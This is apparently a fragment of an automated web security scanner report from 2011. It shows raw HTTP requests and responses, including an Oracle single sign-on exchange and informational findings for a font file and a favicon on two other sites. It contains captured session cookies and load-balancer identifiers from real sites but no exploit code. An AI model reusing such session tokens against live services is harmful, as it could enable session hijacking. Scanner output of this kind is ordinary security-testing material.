User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:30 GMT
Set-Cookie: OAM_REQ=VERSION_4~rHPhjRXD8QG6y%2fjCF%2bf%2fFZxcUX2CeXT0kcF2HTkMBOcLLkOvSuyr1Rb6BgvZDb5rg6a0rsA2Vmqdh11OVr%2frjPFoakHkP4kqM%2fW2ScpLBTkndAEAA2WYI1tIHWQwG%2fsbefHfB9laP%2bnXJPBzUJKEocy63IaWPJ2oqlrXAEvrcDDtOwHniU4Bbe4VWlOBMFw1HU9k0lg6UOcybg33ovXi3j6ZhQDLXzzwUjBER6phLEgEyzEUi%2fIKRtSXeGM6svDt1sR4af58MTwFuyK4at%2bWdZb0BeLph6HJdrvE4Yfy0gZidhK%2bAAd%2bHocmNdHX8qOgIQodQCgEMkBdKhvp75VXVh6M%2fROaMtkyRqOrbAc%2biSu%2f21%2fc8pcgcPejh4C7czA%2f6VftbwCC1aqncoN%2bYJU9AuerZJ4TJsokHbI%2bxX4MLOJ9w3lfYeBe0MXOfdf0AIfbN0cVYQCS%2f%2fDnLonKc6UHxtGv5%2fso45PWSJ8D9JG%2bNavv3ahdnklHFNbkwGPlrMWXn%2bI9%2fTdm9yHdlaUaUAxY6fm4g2WwbpPBLTHlHS0eF6MSWC9%2bF2X%2f52ogwelXUDNVB8Ae5bG1U%2f%2bYg0TQzN5v66C0Yd7XN%2fbfWPG3Cdiys%2fVWXaZU%2fClAgHeeoSd6dk5Z98IKkjzpmCZjv%2bn48ijiSHAnXZAzwajzC7e8Eqtv48Zu2VESny4E9z90l%2ffqAxyMd1tlLCFe5ppuQhpfhyleb01FWZHx8DdhBMD9I7wwjJMCMFHOb5mrJdd6PphGh9c8FFSesutrMAsrZyc54qSVknzgoxqBZJB%2fsSPlptZKwj4OXGZxhXEp8y8Rm4Pckimkagl9cL4VS3PzSnqlJJbBlofFyLagB7IsSfMigwWIwPKB8Aw%2fXr1wb3xNGmx5uSkQ4pLNesPwiiSLzXUTlUgvtP9fHLZZNmo4yjJoOWOQigXmIesWpMjAHfrMTnbk30EISqJJWmlYK%2ftErfbfMwsmS0UPxinI6GtFJ4lo7E6LkqE7W71gXxH0NXBsoj2dy1ZC0Z01WE1KBm1NALFivG2PcVXmpwka2jrR60xtB3i5CNVuFAZHyBb9n24aMWZJ06bxr6Vpv2aEymBPGj3kS%2f6OVq4bNCMHKTQkVFH0W%2f3tF%2fMZ5BBkAKszgNeiujHqh4y2C8ZtzY0iV8JrjjMGhy3%2bT9lJKbYiPp99%2bctXkfISmUU3vfsbPq6omC%2bsuYo068a4q4deDf9sD5vfNLBVe0BnGVpwl5eX8j00WYtUcR18BtGtcj3DEqvezGNCdVfi68UR%2bvrAQ827BghHlilw0TzOvuvqMnt%2fsp5pK8CrD7WVaQw9pc8ds6uhB6ivvnXZP9DvyxBPh71Zu9dfTSy0SDviiwEVS4hKX8EFLy%2fVv1RtgLytG%2bYFgX60K%2byQwd%2fLe34eWdwVP4HcrSvzJYbckecreY3BSxFE943HLGDwOtl4ruhmA9SNoL%2b8bqR19n2VTVJgdhlDzQJ1X6pP9YoA3vywNypQWhr22dx1jE1U4gIDlwow6lpPKgwBLWA%2b3kMbndWD3WPoZ3ZIHhPpMXUg08smbH8Sdy3IaFRvG6bbaU5GcZkH%2f6Ow6JfzGn1UmFn1NggSbsG3c10P5UeHaNjGNjbpis%2bk0scc0yAEBEau3eDSNJYmBkU24neLUPANvyF59o1c6fYijn5MowQGcvJesm7H4NZ4SDEtcnIDllFKLp5ZaqaptPlSKzSJnWPAku6%2b9LYJ1UM0TVS1DLy2h7euLn4Vq1zlc9zziccHk%2fNnE12LWblXJSuay0cvprgwm0%2b9a1y2MNJVkQn%2f7Rj95Fn0AhkugaFeft5QJJ5LkKo4%2bQ873G9gTomi6XI6WO%2bw%2brNwUJyHiBQILq9c3daU3mlKo6km8d81vHwohyC0eR4WaAMqwIqkCbBnlhR6ZSegfE8Zyexls1oGiwKtwif1jfvhff9GwFci8wP8HhZEfoG6EaIx94z4p6KLbXp%2f60t2rxUch2%2fDbyfSxfOjTAQbk3h5ReIq2izOVtjAgHzG%2bpQtgaXpmtUWoAEXm30xSqtVivDKNJ6l6cj2BDzvQr4Qc2R7ibEYavShPpym%2fxYVNIsYDot1e6uABrIYmqUlAlvymA5agP5wjVyJJa6b61Mcry3uf%2fj9O8m16SS46JomgAOI7CpaWpGNbn3XdScM%2f4fAm4PxeC%2frE4g950Simk2vrTVukQqCndyj8%2fWo9IUE2TsXcB1BXafBKIUhfdX3NVy3mzxikpgMZgYhyuzX1pCBLxVQFqFS00ptuVyO%2fO50qOPARagZLCieJrQGp3cFN%2fT8L2vn%2fUfhnv94707MdrnCQtEqyooGRk%2fiuNGQnJ%2fh9BgS8kexVv3Oo5BwANDB3YnqqNYJtjx8wdii85X4BGuonRAhEanru9bBYBjfzVMCyKrgbGhImmVNg5fO42WxeW0FCV1uS33ICsGC0eIbG2pWqSeYFL8znPl1wTy7upc%2fmkshg0nZX1IIU8eLDab1nOW39%2fivWmUK%2f8Z3khcAyPF4ssLjlESGYV0Rec8zh44N14HNEkl1HV%2f1C3%2fsFAWat5q0batJwSvYZu%2f37cquKNz9ylNGnFlZT3G5dc9vMDrXEP6WoEKkZmDzV7j5B8eJ%2bzDjfYlroY8EwmagBDCr9Oc3cFtp3425w4SE5wuzqLJtb8beqRcZ9fNSDrB0iLlU9XJzsRUUHvZJ3ShLSR%2fumACB9gf0IkfakmZHLfufn2F9s2onFRG%2b4UfqkfK3dptld84hsptcZ%2bWuCB0pUsLWTW9dTSLmfspp%2fk60jwieLBfibvbC4195ntM%2bFliH5fdP2%2fO2BoXP4uQciAPvddz5O%2fq1mVjNuv%2ft8V8J3Gtr9xkZxJiH7MmyGfZ3N4ySXv3f1L3GGK9Bm0UNbz0nxuT8wDY6J%2fp1nPja6a1jNsoLpVZeN3VpiT6xdbD6ntPfiCKLEJQrSaOO%2fKzaorqdq0E5pElr4OQTE3%2b4jmgVigvPGlFRd7F52RSOaXFsR0W%2bswawVxLqDNv7C6NueZkh8wOqbqvvUez1oz6Dcqa3qJnsl3HrvPedfbqkCZIcY5cTya1ES6DwdDpLpfD0SoTmD9IEcLBnFgiIIu2W%2blGphWB8f3Y0Vyvhhm3nuednaJO1rasC3EMp7IJV4N2L4TNbmgLK6i6jPfW7DQ1Hz7uSKToangEJMfIgYRcmHdLeq0%2b2jny3hqNXi%2f9Tp4ohijG1E%2fip%2fX%2bLAms3MQle%2frRDAoWFtgHQsjKaGxuEPl1i88XOWh528FAPHlF8O104qHdRM0ua%2bhay5U7ku6w6c4CWMcp0RcVK8vF2A%2bCCk0ExnkNsSXwo%2fsUjhJn9L3DX%2b3OWPsSVGI4OqNCg3x5WGHPPXrrgf8CDpRcD0PqYLo%2bwT7Qzu%2f8LnFJZdO1zK0s6kPsdO7uSZY0T1spJYutSMcFxIL%2bHHhhDWdPwOXwj1R9JV%2bd9U3LcVsbT07rAWYMQ6mC7lNvzyGBy7tRYULsxWi8UJpK%2facmmiaHSKILs1IjZZX1IYkTBtohUePcMmrV1t%2bcWDTkJloPjKjK9TdiVaLVyHMwDUVA0uftR48E4rrdGen6drbCBdq2NzOZjOv0tdPVSOiHjsQxG9%2f7Dn6AhR5x936i4nAEwbSCryzHT6R%2bJH4d9hOiBtezy6pp4bgYO; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000It^IrK66uHK6EVADUS1DIbuZ00C3GL
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Sun, 27-Feb-2011 07:26:30 GMT; path=/
Content-Length: 6016

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

18.10. http://tap11.com/css/Geogtq-Rg.otf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap11.com
Path:   /css/Geogtq-Rg.otf

Request

GET /css/Geogtq-Rg.otf HTTP/1.1
Host: tap11.com
Proxy-Connection: keep-alive
Referer: http://tap11.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: StarTag-UUID=e3eabc37-5116-43bc-a61b-d0fc6df22c54; StartagSessionId=5ce97420-71be-439d-809d-0789b9f05183; JSESSIONID=2E466CB92351C472835510553FEA5403

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"51800-1298938932000"
Last-Modified: Tue, 01 Mar 2011 00:22:12 GMT
Content-Length: 51800
Date: Tue, 01 Mar 2011 10:17:31 GMT
Age: 1692
X-Cache: HIT from cache1
Via: 1.0 cache1 (squid/3.1.9)
Connection: keep-alive

OTTO.......@CFF ..v...@x....GPOS!......t..".GSUB...S..?,...JOS/2.Q.....0...`cmap..62...X....head.q.........6hhea    ..+.......$hmtx..])...`...Lkern.Y........    .maxp..P....(....name=R..........post...2....
...[SNIP]...

18.11. http://www.kingdee.com/favicon.ico  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kingdee.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.kingdee.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: nginx/0.8.49
Date: Sun, 27 Feb 2011 22:34:34 GMT
ETag: W/"1406-1206340034398"
Last-Modified: Mon, 24 Mar 2008 06:27:14 GMT
Content-Length: 1406
X-Via: 1.0 tjtg100:80 (Cdn Cache Server V2.0), 1.0 wzdx171:8103 (Cdn Cache Server V2.0)
Connection: keep-alive
Age: 1

..............h.......(....... ....................................D...J...Q...Q...U...e$..}D..._..............................:........................................................................
...[SNIP]...

Report generated by XSS.CX Research Blog at Tue Mar 01 09:24:04 CST 2011.